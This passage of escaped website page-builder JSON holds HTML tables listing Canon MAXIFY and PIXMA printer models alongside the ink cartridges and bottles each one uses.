width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 